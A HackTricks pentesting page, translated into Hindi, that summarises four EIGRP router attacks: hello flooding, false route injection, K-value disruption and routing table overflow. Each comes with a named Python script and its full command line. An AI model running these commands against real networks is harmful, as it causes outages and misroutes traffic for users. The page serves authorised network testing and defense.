EIGRP Attacks
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
यह उन हमलों का सारांश है जो https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 में उजागर किए गए हैं। आगे की जानकारी के लिए इसे देखें।
उद्देश्य: EIGRP हेलो पैकेट्स से राउटर CPUs को ओवरलोड करना, जो संभावित रूप से Denial of Service (DoS) हमले की ओर ले जा सकता है।
उपकरण: helloflooding.py स्क्रिप्ट।
निष्पादन: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
पैरामीटर:
--interface
: नेटवर्क इंटरफेस निर्दिष्ट करता है, जैसे eth0
।
--as
: EIGRP स्वायत्त प्रणाली संख्या को परिभाषित करता है, जैसे 1
।
--subnet
: उप-नेट स्थान सेट करता है, जैसे 10.10.100.0/24
।
उद्देश्य: एक झूठे मार्ग को इंजेक्ट करके नेटवर्क ट्रैफ़िक प्रवाह को बाधित करना, जिससे ट्रैफ़िक एक गैर-मौजूद गंतव्य की ओर निर्देशित होता है।
उपकरण: routeinject.py स्क्रिप्ट।
निष्पादन: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
पैरामीटर:
--interface
: हमलावर के सिस्टम इंटरफेस को निर्दिष्ट करता है।
--as
: EIGRP AS संख्या को परिभाषित करता है।
--src
: हमलावर का IP पता सेट करता है।
--dst
: लक्षित उप-नेट IP सेट करता है।
--prefix
: लक्षित उप-नेट IP का मास्क परिभाषित करता है।
उद्देश्य: EIGRP डोमेन के भीतर निरंतर व्यवधान और पुनः कनेक्शन उत्पन्न करना, परिवर्तित K-मूल्यों को इंजेक्ट करके, प्रभावी रूप से DoS हमले का परिणाम।
उपकरण: relationshipnightmare.py स्क्रिप्ट।
निष्पादन: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
पैरामीटर:
--interface
: नेटवर्क इंटरफेस को निर्दिष्ट करता है।
--as
: EIGRP AS संख्या को परिभाषित करता है।
--src
: एक वैध राउटर का IP पता सेट करता है।
उद्देश्य: कई झूठे मार्गों से राउटर के CPU और RAM पर दबाव डालना।
उपकरण: routingtableoverflow.py स्क्रिप्ट।
निष्पादन: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
पैरामीटर:
--interface
: नेटवर्क इंटरफेस को निर्दिष्ट करता है।
--as
: EIGRP AS संख्या को परिभाषित करता है।
--src
: हमलावर का IP पता सेट करता है।
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)